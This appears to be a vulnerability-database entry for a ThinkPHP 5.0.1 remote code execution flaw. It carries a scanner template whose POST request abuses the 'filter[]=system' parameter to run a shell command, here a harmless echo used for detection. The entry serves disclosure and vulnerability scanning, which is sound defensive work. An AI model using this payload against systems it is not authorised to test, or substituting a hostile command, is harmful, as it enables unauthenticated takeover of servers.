thinkphp-501-rce: ThinkPHP 5.0.1 - Remote Code Execution

日期: 2025-08-01 | 影响软件: ThinkPHP 5.0.1 | POC: 已公开

漏洞描述

ThinkPHP 5.0.1 allows remote unauthenticated attackers to execute arbitrary code via the 's' parameter.

PoC代码[已公开]

id: thinkphp-501-rce

info:
  name: ThinkPHP 5.0.1 - Remote Code Execution
  author: lark-lab
  severity: critical
  description: ThinkPHP 5.0.1 allows remote unauthenticated attackers to  execute arbitrary code via the 's' parameter.
  reference:
    - https://www.exploit-db.com/exploits/46150
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-77
  metadata:
    max-request: 1
  tags: edb,thinkphp,rce,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/?s=index/index/index"

    body: "s=echo%20thinkphp%20%7C%20rev&_method=__construct&method&filter[]=system"

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "phpkniht"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205119f2e913fe12056da60000bfaca975a17effaf6ad8be6a29951496b2ef1b12022100f0aeb2f75ad1e527c791654b9f78c703f65f39a66d1cd345b751daf6d1f346cd:922c64590222798bb761d5b6d8e72950

相关漏洞推荐